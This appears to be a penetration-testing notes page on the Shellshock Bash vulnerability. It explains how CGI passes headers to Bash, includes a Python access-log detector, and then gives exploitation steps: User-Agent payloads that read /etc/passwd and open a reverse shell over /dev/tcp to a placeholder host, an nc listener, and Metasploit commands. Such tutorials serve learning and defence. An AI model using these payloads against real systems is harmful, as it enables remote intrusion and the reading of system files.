Shellshock (CVE-2014-6271)

Shellshock is a name given to a family of vulnerabilities in the Bash shell (since v1.3). It allows an attacker to remotely execute commands via Bash on the target system.

It is no longer a common vulnerability.

It is caused by a bug in Bash's handling of environment variables: when a variable's value begins with a function definition, Bash mistakenly executes any commands that trail the sequence of characters `() { :; };`.

In the context of remote exploitation, Apache web servers configured to run CGI scripts or .sh scripts are also vulnerable to this attack.

CGI (Common Gateway Interface) scripts are used by Apache to execute commands on the Linux system, and their output is returned to the client. Apache passes HTTP request headers (such as User-Agent) to the script as environment variables, which is how attacker-controlled header values reach Bash.

In order to exploit this vulnerability, an input vector or script that allows attackers to communicate with Bash is needed.

Any legitimate CGI script can be used in the context of an Apache web server.
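From the defender's side, the same function-definition prefix that makes the attack work is also its most reliable log signature, because the headers that CGI exports as environment variables (User-Agent, Referer) are recorded in Apache's "combined" access-log format. The following Python detector is an added example, not part of the original notes; the log lines it scans are constructed for the example, and the field names in its output are my own.

```python
import re

# Constructed sample lines in Apache "combined" access-log format (not from the
# original page). The last two quoted fields are the Referer and User-Agent
# headers, which mod_cgi hands to the script as environment variables.
SAMPLE_LOG = r'''
203.0.113.5 - - [10/Oct/2014:13:55:36 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"
203.0.113.5 - - [10/Oct/2014:13:55:37 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "() { :;}; /bin/bash -c 'id'" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2014:13:56:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.9 - - [10/Oct/2014:13:56:02 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "curl/7.38.0"
'''

# One combined-format line: ip, ident, user, [time], "request", status, size,
# "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Vulnerable Bash versions treated a value starting with "() {" as a function
# definition; optional whitespace between "()" and "{" is tolerated, so match it.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Request fields that end up in the CGI environment and are worth checking.
CHECKED_FIELDS = ("request", "referer", "ua")


def parse_combined(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock(log_text):
    """Return one hit per log line whose request, Referer or User-Agent carries
    the Shellshock function-definition prefix. Each hit records the client IP,
    the field that matched, the offending value and the requested resource, so
    an analyst can see which CGI script was targeted."""
    hits = []
    for line in log_text.strip().splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue  # not a combined-format line; skip rather than guess
        for field in CHECKED_FIELDS:
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append({
                    "ip": rec["ip"],
                    "time": rec["time"],
                    "field": field,
                    "value": rec[field],
                    "request": rec["request"],
                })
                break  # one hit per line is enough
    return hits


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} {hit["field"]}={hit["value"]!r} '
              f'-> {hit["request"]}')
```

Matching on the function-definition prefix rather than on a specific command after it catches payload variants that this page's `cat /etc/passwd` and reverse-shell examples only illustrate; the status code in the matched line then tells you whether the CGI script actually ran (200) or the request was refused. The real fix is a patched Bash, which stops importing function definitions from arbitrary environment variables.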

Exploitation

Manual exploitation

Use Burp Suite to exploit this vulnerability by inserting the payload into the User-Agent HTTP header.

# Check if the server is vulnerable to Shellshock vulnerability
nmap -sV TARGET_IP --script=http-shellshock --script-args="http-shellshock.uri=/PATH_TO_THE_CGI_FILE.cgi"

Open Burp and send the request for the CGI script to Repeater.

Modify the User-Agent to:

() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'

Obtain a reverse shell on the target:

# Listen on port 1234
nc -nvlp 1234

# Modify the User-Agent to
() { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/LOCAL_IP/LOCAL_PORT 0>&1'

Metasploit

use exploit/multi/http/apache_mod_cgi_bash_env_exec

set RHOSTS TARGET_IP

set TARGETURI /CGI_SCRIPT